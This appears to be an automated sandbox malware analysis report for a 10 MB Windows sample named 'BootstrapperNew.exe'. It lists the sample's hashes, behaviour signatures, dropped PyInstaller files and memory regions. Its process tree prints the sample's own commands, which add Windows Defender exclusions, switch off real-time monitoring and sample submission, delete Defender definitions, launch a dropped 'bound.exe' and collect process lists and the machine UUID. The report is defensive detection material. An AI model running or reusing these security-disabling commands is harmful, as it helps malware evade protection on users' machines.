Analysis

  • max time kernel
    96s
  • max time network
    127s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-02-2025 02:04

General

  • Target

    BootstrapperNew.exe

  • Size

    10.0MB

  • MD5

    67e73f4417fda65b081f0fa55ac23b14

  • SHA1

    ae1bdb410b97ed3212cf649af364531d7a640a1b

  • SHA256

    c5792d15b0c5a001d8933ab76b92404c38f4d390540cb079b623a24de4d6abb0

  • SHA512

    64f5ba113cd64cf3fa62415ebfe4360e6086c46fed5e4c975c3625bd483e3b7ae35e058841eedabb9e2a123c2b4f75adf288bea6f8c1002af72106a828f74110

  • SSDEEP

    196608:WWO069YASYMYYBKpYDXcbwO/ikbwfI9jUCD6rlaZLH7qRGrGIYUoZy8FUsOnAov:jEHOXcb1inIH20drLYRZjov

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • UPX packed file 51 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
    "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2988
    • C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
      "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4844
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3108
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1868
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2884
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4124
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:928
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4752
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:852
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Executes dropped EXE
          PID:1608
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:184
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:3672
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2664
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1368

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    d85ba6ff808d9e5444a4b369f5bc2730

    SHA1

    31aa9d96590fff6981b315e0b391b575e4c0804a

    SHA256

    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

    SHA512

    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    6c47b3f4e68eebd47e9332eebfd2dd4e

    SHA1

    67f0b143336d7db7b281ed3de5e877fa87261834

    SHA256

    8c48b1f2338e5b24094821f41121d2221f1cb3200338f46df49f64d1c4bc3e0c

    SHA512

    0acf302a9fc971ef9df65ed42c47ea17828e54dff685f4434f360556fd27cdc26a75069f00dcdc14ba174893c6fd7a2cfd8c6c07be3ce35dafee0a006914eaca

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    65e4f01c24b55569d54d23b8efd0c8d5

    SHA1

    2c58f21418af8c0f1e118a7f3cf17d8448a8be64

    SHA256

    c1e9cf9a0865152d180419cb3ebc77538bdbdc9d1e633eb71ad6871fbc4d4763

    SHA512

    afaf0c200caba78650aee46bd62994c5becc073c22cb62404f783b257c78a72061e240b8678c38790b2cec1e41429161b13c6d92cc9817fe70e86abff5af2056

  • C:\Users\Admin\AppData\Local\Temp\_MEI29882\VCRUNTIME140.dll

    Filesize

    117KB

    MD5

    862f820c3251e4ca6fc0ac00e4092239

    SHA1

    ef96d84b253041b090c243594f90938e9a487a9a

    SHA256

    36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

    SHA512

    2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

  • C:\Users\Admin\AppData\Local\Temp\_MEI29882\_bz2.pyd

    Filesize

    50KB

    MD5

    94309558eb827e8315d0f201bbe7f2b1

    SHA1

    b0a511995528860239b595774a1912e8f1220c42

    SHA256

    fe14d1af436b07370607c6798c3eb15fc439837cc9cbe7cbc3271b07c9ed55b6

    SHA512

    1163da89470b4f4f11786961d2b24a0c01939a174415fac8321f402d85c067572f18d7a8f43ec8abdcc6f14dc76f780ec36004ac34593988240f6a7642e60365

  • C:\Users\Admin\AppData\Local\Temp\_MEI29882\_ctypes.pyd

    Filesize

    64KB

    MD5

    fc40d41aff12417142c0256e536b4a1a

    SHA1

    237157d6af4ec643c4d8480cf3d332951a791cc1

    SHA256

    0712d9412ea0d276c9a726765c072e00146f5aea853818d177b1a5b425839641

    SHA512

    b7625a5325a5b184b1733931dc3857ea5c118d85a506875dcb6b195c2372723b9c6cf80e4688c0fc1383ea063c9d831dd4c0e10ec429dd0f363aa678b1c99f6b

  • C:\Users\Admin\AppData\Local\Temp\_MEI29882\_decimal.pyd

    Filesize

    119KB

    MD5

    0e02b5bcde73a3cc01534fba80ec0462

    SHA1

    decd14b79adf47cc74085beed8a997552d97b965

    SHA256

    286c99901c103d39c3e79bf30ce06f2825260e04ef7d2f0d77fcc08fb93e1d4b

    SHA512

    9556fbd408a5f5e0c21212cda2e2c164cd5093bb8668c152db4b72d03944f1f172ac8e0e194b3eedd1d4697ca2e7d50fcc77fe47014eda14ab658648005cb338

  • C:\Users\Admin\AppData\Local\Temp\_MEI29882\_hashlib.pyd

    Filesize

    36KB

    MD5

    933a6a12d695c7d91ef78a936ab229c7

    SHA1

    ff16c267921ed4dd7f2a129df675a2bc6a52be2a

    SHA256

    60d239d691eb3e31d99848ba9167b5797c897b2896fa5605e61f5bce08e9cb11

    SHA512

    fd5416529061851e90aba6782e1550d9c48d0b10d39f52bd3ff984fbb88d0c06ee54675108508aad819d49362fb6ba74e9d3ad6dd0f3aa17654a07cae6ae099a

  • C:\Users\Admin\AppData\Local\Temp\_MEI29882\_lzma.pyd

    Filesize

    87KB

    MD5

    042ac1b18a7f6fff8ed09ec9efa9e724

    SHA1

    643f3dca141f8fea4609b50907e910be960ce38a

    SHA256

    491b8a4f143c7a505e7c36a2279e84aca902e65a1e28aa6d50bcc37dbf6b5334

    SHA512

    940a44363d385e4e9fa23c06cf6d013d2585424e6a174e2afbdaa5a0cd21836a5df438859eff45a3b6e70e47322d8c8c5fa5d83315be34cfd6769e8fc2084a21

  • C:\Users\Admin\AppData\Local\Temp\_MEI29882\_queue.pyd

    Filesize

    27KB

    MD5

    1073d3147f0d6a1880b78a5a5695fc70

    SHA1

    d97b690c490a51182e9757c15d14dfefd840e746

    SHA256

    65ad239871835a3823401647b2dad935075b4e33a5913fd12d7f2a02b6c49d82

    SHA512

    45d046d2e702447aa00bada25d76fe17c3a4c8822ac62739fe820e9eac66c5262323d66ad90cddde31dd01ecd6db0128cd96950e9857c9c5c59524027c75255f

  • C:\Users\Admin\AppData\Local\Temp\_MEI29882\_socket.pyd

    Filesize

    45KB

    MD5

    fcfdf8cd83a8d506a4483a72eb57026c

    SHA1

    74428908c0068c3de2f4281aba16c13cdd28be04

    SHA256

    2a6b686817b640dcabc58e60289d9ace9ace3e4bc217d78953439549cee65a8a

    SHA512

    3b63e08370fa76ca8c81fc7639492367d250d507f0fb7e0e582078997ba2fa246c48eeaa9faed866dface4fcb08319096a83048dc333ad4be21947f5146b1768

  • C:\Users\Admin\AppData\Local\Temp\_MEI29882\_sqlite3.pyd

    Filesize

    59KB

    MD5

    1e16d084725d9b79f17ccb1996df7410

    SHA1

    3c49ba7b3acf317eedaa7c75319f1b39f91b79ba

    SHA256

    cc17586da3a099b45644ce76cd53ffcb3f5836e9db213152e3a880569c50ca7a

    SHA512

    4932f891e386792a03f6340ac7c9fe9dfd52e6f4a948951520c24b5f6204b26e3fc9455658e52efdce188a98c1e0f33d86493547dad47517ffafb9bb2c088549

  • C:\Users\Admin\AppData\Local\Temp\_MEI29882\_ssl.pyd

    Filesize

    68KB

    MD5

    0a56191c7fb0ae4f75de0859aeba458f

    SHA1

    6b1c4d1906bea388c6690fe93f12013db959a4f9

    SHA256

    e07199062e32fb086f8cb35c36239f1bdfe15ea10f72864fed1953dc0c2dd61c

    SHA512

    014b18a33f7ed88f4c326a7981ec670c197d1fba54f7e050c64fe409551cdc89e8fc3ce7205cd8f45cc548c6982e00049e03ea2aeb2360b1c85ce9beb1aa8410

  • C:\Users\Admin\AppData\Local\Temp\_MEI29882\base_library.zip

    Filesize

    1.3MB

    MD5

    6cd6f151cf2e585690cbd528fcbaaffc

    SHA1

    5a850f8b07bf8153271602d21428bc293870db7b

    SHA256

    e261ebc5157a07a9dcc60b4d48bff51654c53f029c9f2df22104aefde020d736

    SHA512

    a6a60c9f088a3fc1e68d2b9dd1f026175729cb4d5b834e2c6cdba8b03c7d7723c5153bcc26f2625d82ebb82e16b2390f4b4b3e3646eebda2b0bdbd2c845bccb7

  • C:\Users\Admin\AppData\Local\Temp\_MEI29882\blank.aes

    Filesize

    109KB

    MD5

    92e33c6efca00726b8a8418745c2d19c

    SHA1

    f31fdf1bb2d2061379d796537995579cdbf6a75f

    SHA256

    3a7f23d14c4adb135f4c33bcba5e7edc95c48de0fe7d5575846aba53702dc54a

    SHA512

    319c8b96fda8fe1db32d1f3f400247d4dbc7e7920bdabfbfc0ed5d889f2f4a5562a567eed393d27a5174aedad8dd8540d01c1b84fba7e18ab46c4ac5dc58d6a6

  • C:\Users\Admin\AppData\Local\Temp\_MEI29882\blank.aes

    Filesize

    109KB

    MD5

    f99b68fa7b8d7e92e4ce5e1e069ffec8

    SHA1

    58c512d2adc1a47a3384d80af2748c154a2bc5ef

    SHA256

    3ea184f62ea32361966fd58bb01c388dfde210407ae5195228f95c46f5d23b2f

    SHA512

    13eb838c6612c203447d779cd535643b258b604f1e9fa0ca8222eb306b7618bc6428b6089a8ffe0d90a0151994f59165c70031c9a73c8322144fa9a835e8b4cf

  • C:\Users\Admin\AppData\Local\Temp\_MEI29882\bound.blank

    Filesize

    2.4MB

    MD5

    730ac4974fa2f6a182a4ec538db6ef24

    SHA1

    d0354a02dc62e00c7f6027d90d2e2fe112cab401

    SHA256

    7e7df3f4e9e11051c7d599aa34b9c2ee68b2ee9034c4a069d5995a2cbf904008

    SHA512

    994f0c393671eec179b2bd013b06a1bf16e435473f4bb276b3de929f31251563b62a1c7475ac3bf3a72bc750fa70f7f00180317f42f948066ab7dc048b976cb5

  • C:\Users\Admin\AppData\Local\Temp\_MEI29882\libcrypto-3.dll

    Filesize

    1.6MB

    MD5

    8377fe5949527dd7be7b827cb1ffd324

    SHA1

    aa483a875cb06a86a371829372980d772fda2bf9

    SHA256

    88e8aa1c816e9f03a3b589c7028319ef456f72adb86c9ddca346258b6b30402d

    SHA512

    c59d0cbe8a1c64f2c18b5e2b1f49705d079a2259378a1f95f7a368415a2dc3116e0c3c731e9abfa626d12c02b9e0d72c98c1f91a359f5486133478144fa7f5f7

  • C:\Users\Admin\AppData\Local\Temp\_MEI29882\libffi-8.dll

    Filesize

    29KB

    MD5

    08b000c3d990bc018fcb91a1e175e06e

    SHA1

    bd0ce09bb3414d11c91316113c2becfff0862d0d

    SHA256

    135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

    SHA512

    8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

  • C:\Users\Admin\AppData\Local\Temp\_MEI29882\libssl-3.dll

    Filesize

    221KB

    MD5

    b2e766f5cf6f9d4dcbe8537bc5bded2f

    SHA1

    331269521ce1ab76799e69e9ae1c3b565a838574

    SHA256

    3cc6828e7047c6a7eff517aa434403ea42128c8595bf44126765b38200b87ce4

    SHA512

    5233c8230497aadb9393c3ee5049e4ab99766a68f82091fe32393ee980887ebd4503bf88847c462c40c3fc786f8d179dac5cb343b980944ade43bc6646f5ad5a

  • C:\Users\Admin\AppData\Local\Temp\_MEI29882\python313.dll

    Filesize

    1.8MB

    MD5

    2a4aad7818d527bbea76e9e81077cc21

    SHA1

    4db3b39874c01bf3ba1ab8659957bbc28aab1ab2

    SHA256

    4712a6bb81b862fc292fcd857cef931ca8e4c142e70eaa4fd7a8d0a96aff5e7e

    SHA512

    d10631b7fc25a8b9cc038514e9db1597cec0580ee34a56ce5cfc5a33e7010b5e1df7f15ec30ebb351356e2b815528fb4161956f26b5bfaf3dce7bc6701b79c68

  • C:\Users\Admin\AppData\Local\Temp\_MEI29882\rar.exe

    Filesize

    615KB

    MD5

    9c223575ae5b9544bc3d69ac6364f75e

    SHA1

    8a1cb5ee02c742e937febc57609ac312247ba386

    SHA256

    90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

    SHA512

    57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

  • C:\Users\Admin\AppData\Local\Temp\_MEI29882\rarreg.key

    Filesize

    456B

    MD5

    4531984cad7dacf24c086830068c4abe

    SHA1

    fa7c8c46677af01a83cf652ef30ba39b2aae14c3

    SHA256

    58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

    SHA512

    00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

  • C:\Users\Admin\AppData\Local\Temp\_MEI29882\select.pyd

    Filesize

    26KB

    MD5

    fbb31cb3990b267f9c5fb02d1aa21229

    SHA1

    cdae1c90d80c81927edb533fb5850c6efd541812

    SHA256

    8e2c5b74031b80a20bd16c149a389e60b3845d9719d97e030c42e9718cc08937

    SHA512

    af71f8be59d062cb4d095772e30ba63d0fef1e8285d549d7638c009cd67a2610f6d07e486e75f3eb1d94d8dc349d92b996f3ef83bd1d1c3617ac801d571be439

  • C:\Users\Admin\AppData\Local\Temp\_MEI29882\sqlite3.dll

    Filesize

    645KB

    MD5

    a7a7f5664333083d7270b6f6373c18b2

    SHA1

    f8b7729e18c1dad2974514fc685aaa05ed3ff513

    SHA256

    85b1d4d0b7db01ecb9b8c6b1b68ab122e0807eaa607551ba08849fdd957b889a

    SHA512

    cd9a0d4a55a58f18ce565f1525339e84f22496b6264f1fa235310ff6fa3531a0b24fe6e90bdf21b8f9ef2556e726480fe3bd7e69d737f5a580d6bd3e0b8d799f

  • C:\Users\Admin\AppData\Local\Temp\_MEI29882\unicodedata.pyd

    Filesize

    261KB

    MD5

    48a942c3930a1fee7d4404989171f5fb

    SHA1

    b6ea31aedbc3d17136b7c7015f687020dd8723d4

    SHA256

    bc52593f047cba026641ebd758133551289dcca17817c836cbb006d4529d7aa7

    SHA512

    dcea8380f7c7a38cc827bd685cd76ac4d3dc2635f42675f5afaa8ab9e07fb72fc5f6e6fc246bb82f88bf8459caa09f4a0dd6c0d145e245986cfd15d0a49d1c59

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hlk5ec0u.xvz.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\bound.exe

    Filesize

    2.9MB

    MD5

    f227cdfd423b3cc03bb69c49babf4da3

    SHA1

    3db5a97d9b0f2545e7ba97026af6c28512200441

    SHA256

    cb5d6c1ca0aa6232a2d55e14b20ac4a9945a0bd063c57d60a5ed3ae94160e3e8

    SHA512

    b10afd03b02a928545c16fad39a6ae46b68b1e1a2477a6990803ce80008e7161fb2ebc9380ba15a1b074bb436aa34bcd6c94a922933d438b1c22489717e1e10e

  • memory/1608-164-0x00000199989C0000-0x00000199989D6000-memory.dmp

    Filesize

    88KB

  • memory/1608-165-0x00000199989A0000-0x00000199989AA000-memory.dmp

    Filesize

    40KB

  • memory/1608-167-0x00000199FB4A0000-0x00000199FB4A8000-memory.dmp

    Filesize

    32KB

  • memory/1608-134-0x00000199FF370000-0x00000199FF37E000-memory.dmp

    Filesize

    56KB

  • memory/1608-132-0x00000199FF3B0000-0x00000199FF3E8000-memory.dmp

    Filesize

    224KB

  • memory/1608-159-0x0000019998850000-0x0000019998950000-memory.dmp

    Filesize

    1024KB

  • memory/1608-160-0x0000019998950000-0x000001999895A000-memory.dmp

    Filesize

    40KB

  • memory/1608-163-0x00000199989B0000-0x00000199989B8000-memory.dmp

    Filesize

    32KB

  • memory/1608-166-0x0000019998960000-0x000001999896A000-memory.dmp

    Filesize

    40KB

  • memory/1608-102-0x00000199F89C0000-0x00000199F8CA2000-memory.dmp

    Filesize

    2.9MB

  • memory/1608-161-0x0000019998970000-0x0000019998996000-memory.dmp

    Filesize

    152KB

  • memory/1608-129-0x00000199FF360000-0x00000199FF368000-memory.dmp

    Filesize

    32KB

  • memory/1608-127-0x00000199F9070000-0x00000199F9080000-memory.dmp

    Filesize

    64KB

  • memory/1868-85-0x00007FF908603000-0x00007FF908605000-memory.dmp

    Filesize

    8KB

  • memory/1868-91-0x0000025F423C0000-0x0000025F423E2000-memory.dmp

    Filesize

    136KB

  • memory/1868-106-0x00007FF908600000-0x00007FF9090C1000-memory.dmp

    Filesize

    10.8MB

  • memory/1868-98-0x00007FF908600000-0x00007FF9090C1000-memory.dmp

    Filesize

    10.8MB

  • memory/1868-96-0x00007FF908600000-0x00007FF9090C1000-memory.dmp

    Filesize

    10.8MB

  • memory/4844-52-0x00007FF91EF70000-0x00007FF91EF89000-memory.dmp

    Filesize

    100KB

  • memory/4844-74-0x00007FF909240000-0x00007FF909773000-memory.dmp

    Filesize

    5.2MB

  • memory/4844-97-0x00007FF919650000-0x00007FF9197CF000-memory.dmp

    Filesize

    1.5MB

  • memory/4844-31-0x00007FF91D2B0000-0x00007FF91D2D7000-memory.dmp

    Filesize

    156KB

  • memory/4844-62-0x00007FF919650000-0x00007FF9197CF000-memory.dmp

    Filesize

    1.5MB

  • memory/4844-54-0x00007FF91CFD0000-0x00007FF91CFFB000-memory.dmp

    Filesize

    172KB

  • memory/4844-126-0x00007FF919F00000-0x00007FF919F19000-memory.dmp

    Filesize

    100KB

  • memory/4844-84-0x00007FF919F20000-0x00007FF919F45000-memory.dmp

    Filesize

    148KB

  • memory/4844-78-0x00007FF919CC0000-0x00007FF919CD4000-memory.dmp

    Filesize

    80KB

  • memory/4844-64-0x00007FF919F00000-0x00007FF919F19000-memory.dmp

    Filesize

    100KB

  • memory/4844-156-0x00007FF919EF0000-0x00007FF919EFD000-memory.dmp

    Filesize

    52KB

  • memory/4844-83-0x00007FF909180000-0x00007FF909233000-memory.dmp

    Filesize

    716KB

  • memory/4844-80-0x00007FF919B80000-0x00007FF919B8D000-memory.dmp

    Filesize

    52KB

  • memory/4844-75-0x0000021700650000-0x0000021700B83000-memory.dmp

    Filesize

    5.2MB

  • memory/4844-50-0x00007FF920C00000-0x00007FF920C0F000-memory.dmp

    Filesize

    60KB

  • memory/4844-76-0x00007FF91D2B0000-0x00007FF91D2D7000-memory.dmp

    Filesize

    156KB

  • memory/4844-162-0x00007FF909240000-0x00007FF909773000-memory.dmp

    Filesize

    5.2MB

  • memory/4844-60-0x00007FF919F20000-0x00007FF919F45000-memory.dmp

    Filesize

    148KB

  • memory/4844-72-0x00007FF909AE0000-0x00007FF90A144000-memory.dmp

    Filesize

    6.4MB

  • memory/4844-158-0x00007FF912190000-0x00007FF91225E000-memory.dmp

    Filesize

    824KB

  • memory/4844-157-0x00007FF919EB0000-0x00007FF919EE3000-memory.dmp

    Filesize

    204KB

  • memory/4844-153-0x00007FF919F20000-0x00007FF919F45000-memory.dmp

    Filesize

    148KB

  • memory/4844-152-0x00007FF91CFD0000-0x00007FF91CFFB000-memory.dmp

    Filesize

    172KB

  • memory/4844-151-0x00007FF91EF70000-0x00007FF91EF89000-memory.dmp

    Filesize

    100KB

  • memory/4844-150-0x00007FF920C00000-0x00007FF920C0F000-memory.dmp

    Filesize

    60KB

  • memory/4844-149-0x00007FF91D2B0000-0x00007FF91D2D7000-memory.dmp

    Filesize

    156KB

  • memory/4844-148-0x00007FF909180000-0x00007FF909233000-memory.dmp

    Filesize

    716KB

  • memory/4844-147-0x00007FF919B80000-0x00007FF919B8D000-memory.dmp

    Filesize

    52KB

  • memory/4844-146-0x00007FF919CC0000-0x00007FF919CD4000-memory.dmp

    Filesize

    80KB

  • memory/4844-133-0x00007FF909AE0000-0x00007FF90A144000-memory.dmp

    Filesize

    6.4MB

  • memory/4844-73-0x00007FF912190000-0x00007FF91225E000-memory.dmp

    Filesize

    824KB

  • memory/4844-155-0x00007FF919F00000-0x00007FF919F19000-memory.dmp

    Filesize

    100KB

  • memory/4844-154-0x00007FF919650000-0x00007FF9197CF000-memory.dmp

    Filesize

    1.5MB

  • memory/4844-68-0x00007FF919EB0000-0x00007FF919EE3000-memory.dmp

    Filesize

    204KB

  • memory/4844-66-0x00007FF919EF0000-0x00007FF919EFD000-memory.dmp

    Filesize

    52KB

  • memory/4844-26-0x00007FF909AE0000-0x00007FF90A144000-memory.dmp

    Filesize

    6.4MB